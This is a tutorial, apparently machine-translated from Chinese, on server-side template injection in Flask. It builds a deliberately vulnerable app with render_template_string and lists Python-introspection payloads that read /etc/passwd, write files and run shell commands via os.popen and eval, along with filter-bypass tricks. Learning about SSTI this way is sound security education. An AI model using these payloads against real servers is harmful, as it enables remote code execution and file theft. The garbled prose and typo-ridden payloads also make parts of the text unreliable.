SSTI, that is, the server template injection, the cause is the server receives a user's input, use it as a template Web content as part of the process for a goal compiled rendering, perform a user to insert malicious content, resulting in a variety of each kind of problems.
First of all, let's write a simple flask (SSTI think talking about flask frame), since I use pycharm, so you can create a project directly.
app.py code is as follows:
from flask import Flask#flask需要自己安装
from flask import render_template
from flask import request
app = Flask(__name__)
@app.route('/',methods=['GET','POST'])
def hello_world():
return render_template("index.html", title='Home', user=request.args.get("key"))
if __name__ == '__main__':
app.run()
And create folders as follows:
write index.html file in templates in the following: (templates folder location Render files are located)
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>This is a test</title>
</head>
<body>
<h1>hello.{{ user }}</h1>
</body>
</html>
At this point you can run to get
open 127.0.0.1:5000, passing parameters key={{2*3}}can be seen:
at this time and did not execute, because the template already rendered the uncontrollable. But when we put in app.py
def hello_world():
return render_template("index.html", title='Home', user=request.args.get("key"))
Replaced
def hello_world():
code = request.args.get('id')
template = '''
<div class="center-content error">
<h1>Oops! That page doesn't exist.</h1>
<h3>%s</h3>
</div>
''' %(code)
return render_template_string(template)
In this case, the problem is big, because it directly to the contents of the variable as a string output, will cause the following results:
you can see, it directly to the id counted out. We can be injected into the template.
Here we need to know python in some special classes:
__class__#返回调用的参数类型。
__base__#返回基类
__mro__#允许我们在当前Python环境下追溯继承树
__subclasses__()#返回子类
In the flask ssti poc in large part is to find ways we can use the class from the object class (object class is the base class for all classes), such as the simplest payload "".__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('dir').read()is the use of the 134 sub-class object class (os. _wrap_close class) and initialize, re-use global variables to achieve the object of the command execution.
"".__class__Returns <class 'str'>
"".__class__.bases__returns (<class 'object'>,)
"".__class__.__bases__[0].__subclasses__returns all classes
"".__class__.__bases__[0].__subclasses__[133]return is <class 'os._wrap_close'>
__init__used to initialize the class
__globals__is to find all global variables and parameters and methods
used __globals__['popen']to call popen method
Here are some payload:
read / write file:
[].__class__.bases__[0].__subclasses__()[40]('/etc/passwd').read()
''.__class__.bases__[0].__subclasses__()[40]('/var/www/html').write('test')
Command:
"".__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen('whoami').read()
"".__class__.bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('whoami').read()")
"".__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('whoami').read()
There are bypassing tips:
- Keyword filtering, you can use splicing, such as a filter
globals, you can use'glo'+'bals'. - Filtered brackets can be used
__getitem__, for the original:''.__class__.__mro__[2]can be replaced''.__class__.__mro__.getitem__(2) - Filtered
{{}}, available{%%}instead.
There are other tips and payload, you may see p cattle: https://p0sec.net/index.php/archives/120/
Reference article:
https://xz.aliyun.com/t/3679
https://www.cnblogs.com/hackxf/p/10480071.html
